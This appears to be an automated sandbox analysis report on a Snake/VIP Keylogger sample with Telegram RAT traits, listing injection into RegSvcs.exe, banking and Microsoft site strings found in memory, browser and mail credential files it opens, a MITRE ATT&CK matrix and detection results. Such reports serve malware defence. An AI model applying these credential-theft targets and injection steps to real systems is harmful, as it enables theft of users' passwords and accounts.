                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598766Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597641Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596982Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596639Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596516Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595469Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595141Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594811Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594578Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594469Jump to behavior
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
                    Source: RegSvcs.exe, 00000002.00000002.4794609569.0000000000C36000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSyst
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003871000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
                    Source: RegSvcs.exe, 00000002.00000002.4796478018.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_061B9548 LdrInitializeThunk,2_2_061B9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 786008Jump to behavior
                    Source: C:\Users\user\Desktop\7DI4iYwcvw.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7DI4iYwcvw.exe"Jump to behavior
                    Source: 7DI4iYwcvw.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000002.00000002.4794997601.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4794997601.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4793959716.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7020, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		212
                    Process Injection                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		11
                    Security Software Discovery                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Virtualization/Sandbox Evasion                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
                    Process Injection                    		Security Account Manager11
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin Shares1
                    Data from Local System                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Ingress Tool Transfer                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input Capture24
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync113
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    7DI4iYwcvw.exe66%ReversingLabsWin32.Spyware.Snakekeylogger
                    7DI4iYwcvw.exe100%AviraHEUR/AGEN.1321671
                    7DI4iYwcvw.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    http://checkip.dyndns.org/0%URL Reputationsafe
                    https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
